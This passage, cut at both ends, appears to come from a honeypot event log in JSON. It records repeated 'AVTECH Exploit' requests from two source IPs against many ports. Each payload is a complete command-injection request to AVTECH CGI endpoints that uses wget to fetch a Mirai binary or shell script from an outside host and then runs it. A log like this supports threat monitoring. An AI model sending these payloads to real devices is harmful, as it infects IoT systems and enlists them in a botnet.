- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:42:15Z",
- "last_seen": "2020-06-01T04:42:15Z"
- },
- {
- "event_id": "97ca1f27e76db32658a711c3823aff4f0e704495e81bb359049ce30b4b27dcea",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 10243,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:41:48Z",
- "last_seen": "2020-06-01T04:41:48Z"
- },
- {
- "event_id": "7d6ad8558358a7d345dbe9c888ea745a2371f89b0b79e066da2f44cc722bf2a9",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T04:32:53Z",
- "last_seen": "2020-06-01T04:41:32Z"
- },
- {
- "event_id": "9560e14bb1436032c62a4f09e860bb2a0ce6a7b061030b2a4e20f13aab963d90",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 3389,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:36:13Z",
- "last_seen": "2020-06-01T04:36:13Z"
- },
- {
- "event_id": "d8ca79f558fc6d482ea0fbc590ee6589065a89cd1dca83a119cdaf785201f29b",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:36:03Z",
- "last_seen": "2020-06-01T04:36:03Z"
- },
- {
- "event_id": "e8f9d7ce7f1f76cf98cbd9226a900d2fa051e95f2f4300bf8298276f2b71c29f",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8089,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:35:59Z",
- "last_seen": "2020-06-01T04:35:59Z"
- },
- {
- "event_id": "027438a4ff88c2be36cbc2f4838d1d0d14c8e32b52f324cad699126d6d98d561",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 50000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:35:49Z",
- "last_seen": "2020-06-01T04:35:49Z"
- },
- {
- "event_id": "3e903274656637eb67214d2161fcc61521530e45cbf7db234bcb97d2509555c0",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2083,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:35:12Z",
- "last_seen": "2020-06-01T04:35:12Z"
- },
- {
- "event_id": "d98dc7aff46df7a3aa8b56813db01f8d1ee7f92015f5123f3537fa6c33e580fc",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8123,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T04:33:47Z",
- "last_seen": "2020-06-01T04:35:11Z"
- },
- {
- "event_id": "ae3c2e4a6f6876a28b9c0fbf343388347d8b44897996eb3249b5f25d755e9816",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 37777,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:34:59Z",
- "last_seen": "2020-06-01T04:34:59Z"
- },
- {
- "event_id": "bcc956572b607531fd29226e78228d361084d7b21cf73841e382867848e4ea18",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8081,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:34:20Z",
- "last_seen": "2020-06-01T04:34:20Z"
- },
- {
- "event_id": "68c8f3d3e489b0771cfd2c9071c0000ab46a97e40c1344cc9cbc9035a6bd2047",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8112,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:33:59Z",
- "last_seen": "2020-06-01T04:33:59Z"
- },
- {
- "event_id": "dead80d7a8d8344f0d389f91e0ed7a0e7eb46c111c5b31873b723968c9ad1db7",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8112,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:33:53Z",
- "last_seen": "2020-06-01T04:33:53Z"
- },
- {
- "event_id": "13d544dd3364976d0bf34596c3ac3ba4edef6ea81d45bd925244efdbd8bcde97",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:33:00Z",
- "last_seen": "2020-06-01T04:33:00Z"
- },
- {
- "event_id": "05e7f7e5114b3eaa42bcbc57c99c88b0c3bb43eea68326e004e0adcf8844edbf",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:32:59Z",
- "last_seen": "2020-06-01T04:32:59Z"
- },
- {
- "event_id": "3ea2749ea57936a4ebde54db9bbb24468358475b7631cc72cdb298ee0db9ee3d",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:32:51Z",
- "last_seen": "2020-06-01T04:32:51Z"
- },
- {
- "event_id": "d06c6a3c34468123e9f8a5f6defaedf8f976ae7089e53c03a261bbac335118e7",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:58Z",
- "last_seen": "2020-06-01T04:27:58Z"
- },
- {
- "event_id": "6f94c26c966fea6500ee3501ddf7fd6005c56f9b6f01e543d4a6f9892c8e53f8",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:57Z",
- "last_seen": "2020-06-01T04:27:57Z"
- },
- {
- "event_id": "ab3eac1ccc6d6cf585ac4dfb0109c8e9e3baa6052afe8865b912e1bd30380f93",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:56Z",
- "last_seen": "2020-06-01T04:27:56Z"
- },
- {
- "event_id": "fda2924dbbca1715125a6f67c1715fe31ee970f95ebb5a92716433bb22f2fd17",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:54Z",
- "last_seen": "2020-06-01T04:27:54Z"
- },
- {
- "event_id": "e019eb29f643e48b3ea76af18c6a0f644155c7973dfd417d2e37cc832b371ecf",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:54Z",
- "last_seen": "2020-06-01T04:27:54Z"
- },
- {
- "event_id": "5fee61b37fa2fa2f42df8c42df225da8c1f192a4b7c5d9a8af5be91483199a05",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:52Z",
- "last_seen": "2020-06-01T04:27:52Z"
- },
- {
- "event_id": "712af48e0ddf80d76ee7360720c6ab4ddb2c3b34618821708f994f7d3131e342",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:29Z",
- "last_seen": "2020-06-01T04:27:29Z"
- },
- {
- "event_id": "c5d64b47214be466d12b654e26637a6c37a9e47f13fb5ac6a78bb0af0a282355",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 80.8UsA.sh; chmod 777 80.8UsA.sh; sh 80.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:27Z",
- "last_seen": "2020-06-01T04:27:27Z"
- },
- {
- "event_id": "f9b90720571b897fa5e432e93cb7d6960c6f51f629ad8034e5a5765dbe06b162",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 13.8UsA.sh; chmod 777 13.8UsA.sh; sh 13.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:20Z",
- "last_seen": "2020-06-01T04:27:20Z"
- },
- {
- "event_id": "5a4efafdc1ffb4ce7c71f5bfa2f99250d9a1ca1e706622cdb216302145be860b",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 13.8UsA.sh; chmod 777 13.8UsA.sh; sh 13.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:18Z",
- "last_seen": "2020-06-01T04:27:18Z"
- },
- {
- "event_id": "90581e5031659b4cfdba5b3723c820a0a3fa82930d0c72f49566ac255624c1bd",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 13.8UsA.sh; chmod 777 13.8UsA.sh; sh 13.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:18Z",
- "last_seen": "2020-06-01T04:27:18Z"
- },
- {
- "event_id": "61cd570b2895aa4b5c6de586e9488c1be2cc70ff5767453d55826f41cd583ecd",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 13.8UsA.sh; chmod 777 13.8UsA.sh; sh 13.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:27:15Z",
- "last_seen": "2020-06-01T04:27:15Z"
- },
- {
- "event_id": "435a54f8c81bd35dd4170530fc77ba138f73da9419f10366aa134e6d9e30efeb",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 13.8UsA.sh; chmod 777 13.8UsA.sh; sh 13.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:26:51Z",
- "last_seen": "2020-06-01T04:26:51Z"
- },
- {
- "event_id": "4d304eb0ea816e50c6db53e44495c8655d7d2168a0f57804e9624338ed079da2",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8088,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:25:56Z",
- "last_seen": "2020-06-01T04:25:56Z"
- },
- {
- "event_id": "84419d5a3e8491698fc1c133b160cfd15a148076ee1a97330d16238d6e416c6e",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2375,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:23:44Z",
- "last_seen": "2020-06-01T04:23:44Z"
- },
- {
- "event_id": "e251548038d45692c99e423fc294231a3f44d44aa04c7a033357587051e0a84e",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 10243,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:23:34Z",
- "last_seen": "2020-06-01T04:23:34Z"
- },
- {
- "event_id": "f4d2fa194f03ddd07e3c2c8aa5d345c26e5ce409a86cfb130968436900140e73",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8123,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:21:32Z",
- "last_seen": "2020-06-01T04:21:32Z"
- },
- {
- "event_id": "f5816f8b4bada95476db1368177ced095db7c5bf396d74e06087c13829cc5669",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8123,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:21:29Z",
- "last_seen": "2020-06-01T04:21:29Z"
- },
- {
- "event_id": "ac29d7cc78e675c336ec5aead32f06e2a064636a2b413b2e48d9614cc5deebc4",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 52869,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:21:26Z",
- "last_seen": "2020-06-01T04:21:26Z"
- },
- {
- "event_id": "f5dff0a8f6419799ad8075fee58c083cb70a4a59b69854c63a5a0580aa8423b1",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 2087,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:21:22Z",
- "last_seen": "2020-06-01T04:21:22Z"
- },
- {
- "event_id": "e3dbc4e5ae1eebea11d57686a7e64d8d40c53037de897a34021d8b11d36e59b2",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2087,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:21:20Z",
- "last_seen": "2020-06-01T04:21:20Z"
- },
- {
- "event_id": "624b5ab0b5641bb6b60953cee69582acfea092889b0d2c04b8da78e65cf00625",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:19:22Z",
- "last_seen": "2020-06-01T04:19:22Z"
- },
- {
- "event_id": "8f6dfa874abf5cebbdb4539197852525b3fa7672057a262e3ec85a1817ace347",
